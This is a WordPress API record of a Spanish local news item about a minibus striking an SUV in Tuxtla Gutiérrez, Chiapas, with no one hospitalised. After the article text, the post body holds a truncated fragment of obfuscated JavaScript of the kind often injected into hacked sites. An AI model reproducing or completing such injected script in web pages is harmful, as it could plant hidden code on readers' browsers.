{"id":21326,"date":"2025-04-08T00:50:03","date_gmt":"2025-04-08T00:50:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21326"},"modified":"2025-04-08T00:50:04","modified_gmt":"2025-04-08T00:50:04","slug":"colectivo-impacto-a-camioneta-en-la-9a-norte","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21326","title":{"rendered":"Colectivo impact\u00f3 a camioneta en la 9a Norte"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250407-WA0019-1024x576.jpg\" alt=\"\" class=\"wp-image-21327\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250407-WA0019-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250407-WA0019-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250407-WA0019-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250407-WA0019-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250407-WA0019.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 7 de abril del 2025. Tuxtla Guti\u00e9rrez.- Este lunes por la tarde un colectivo de la ruta 2 choc\u00f3 contra una camioneta Vw tipo Tiguan de color naranja a la altura de la 9a Norte y 1a Poniente del Barrio Col\u00f3n.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el conductor de la Nissan Urvan circulaba de Norte a Sur y se pas\u00f3 la preferencia.<\/p>\n\n\n\n<p>La camioneta fue impactada en el costado del lado de la puerta del conductor.<\/p>\n\n\n\n<p>Una persona que result\u00f3 lesionada fue valorada por param\u00e9dicos de la Cruz Roja pero no fue trasladada a un nosocomio.<\/p>\n\n\n\n<p>En el lugar los involucrados llegaron a un acuerdo por los da\u00f1os y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 7 de abril del 2025. Tuxtla Guti\u00e9rrez.- Este lunes por la tarde un colectivo de la ruta 2 choc\u00f3 contra una camioneta Vw tipo Tiguan de color naranja a la altura de la 9a Norte y 1a Poniente del Barrio Col\u00f3n. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21327,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-21326","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21326","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21326"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21326\/revisions"}],"predecessor-version":[{"id":21328,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21326\/revisions\/21328"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21327"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21326"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21326"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21326"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}